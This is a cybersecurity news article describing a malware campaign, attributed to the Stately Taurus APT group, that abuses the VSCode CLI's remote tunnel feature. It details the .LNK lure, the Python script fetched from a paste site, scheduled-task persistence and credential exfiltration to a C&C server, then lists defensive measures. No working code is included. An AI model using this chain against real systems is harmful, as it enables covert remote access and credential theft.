Hackers Turn Visual Studio Code Into a Remote Access Tool

The attackers leverage a malicious .LNK file to download a Python distribution package that executes an obfuscated script from a paste site, which establishes persistence using a scheduled task and checks for VSCode installation. 

If not, it downloads the VSCode CLI and uses it to create a remote tunnel, allowing unauthorized access to the victim’s machine, which is the same as previous campaigns by the Stately Taurus Chinese APT group.

 Infection chain

Researchers discovered a malicious .LNK campaign that mimics installer behavior by downloading python-3.12.5-embed-amd64.zip and extracting it to %LOCALAPPDATA%\Microsoft\Python retrieves a malicious script “update.py” from paste.ee and executes it silently using pythonw.exe. 

Update.py script checks for VSCode installation and, if absent, downloads the VSCode CLI from Microsoft, extracts it, and places “code.exe” in the VSCode program data directory. 

The malicious script creates a scheduled task named “MicrosoftHealthcareMonitorNode” to run “update.py” hidden using pythonw.exe, which runs every 4 hours for non-admin users or at logon with elevated SYSTEM privileges for admins, ensuring persistence and potential for resource control. 

Scheduled task

It checks if VSCode is running and terminates any existing remote sessions if necessary, and then starts a new VSCode process with the command “code.exe tunnel user login” to establish a fresh remote tunnel for future interactions with the victim’s system.

The attacker gathers victim system information (folder names, processes) and sensitive data (language, location, credentials) and exfiltrates it to a C&C server via a POST request after base64 encoding for obfuscation. 

 POST request

Exfiltrated code allows attackers to gain unauthorized access to the victim’s machine via GitHub login, enabling file browsing, directory manipulation, and potentially malware installation through terminal commands. 

According to Cyble, the campaign highlights the sophisticated use of legitimate tools like VSCode by threat actors to gain unauthorized access. By exploiting a .LNK file and an obfuscated Python script, they can bypass detection and execute commands on victim systems, potentially leading to further compromise. 

To enhance security, implement advanced endpoint protection with behavioral analysis and machine learning, regularly review scheduled tasks for unauthorized entries, educate users on file and link safety, restrict software installation permissions, deploy advanced monitoring tools, and audit system logs to identify and mitigate threats. 

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here